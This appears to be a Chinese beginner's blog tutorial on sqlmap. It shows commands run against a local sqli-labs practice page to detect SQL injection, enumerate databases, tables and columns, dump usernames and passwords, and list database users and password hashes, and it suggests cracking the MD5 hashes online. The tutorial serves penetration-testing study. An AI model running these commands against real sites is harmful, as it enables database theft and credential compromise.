sqlmap的使用 ---- 入门

sqlmap是一个自动化的sql注入工具,其主要功能就是扫描、发现给定url的sql注入漏洞。


1. 判断是否存在注入

当url中存在两个参数时,要使用双引号

sqlmap -u +url

sqlmap的使用 ---- 入门_第1张图片

2. 判断文本中的请求是否存在注入
利用工具burp suite抓包,保存为文本
sqlmap的使用 ---- 入门_第2张图片

sqlmap -r +http请求文本

sqlmap的使用 ---- 入门_第3张图片
3. 查询当前用户下的所有数据库

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
sqlmap的使用 ---- 入门_第4张图片
4. 获取数据库中的表名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
sqlmap的使用 ---- 入门_第5张图片
5. 获取表中的字段名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
sqlmap的使用 ---- 入门_第6张图片
6. 获取字段内容

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump
sqlmap的使用 ---- 入门_第7张图片
7. 获取数据库中的所有用户

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --users
这里写图片描述
8. 获取数据库用户的密码

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --passwords
查询到的密码时MD5值,在MD5解密网站即可得到明文密码
sqlmap的使用 ---- 入门_第8张图片
9. 获取当前网站数据库的名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db
sqlmap的使用 ---- 入门_第9张图片
10. 获取当前数据库的用户名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user
sqlmap的使用 ---- 入门_第10张图片

你可能感兴趣的:(sql注入,工具教程)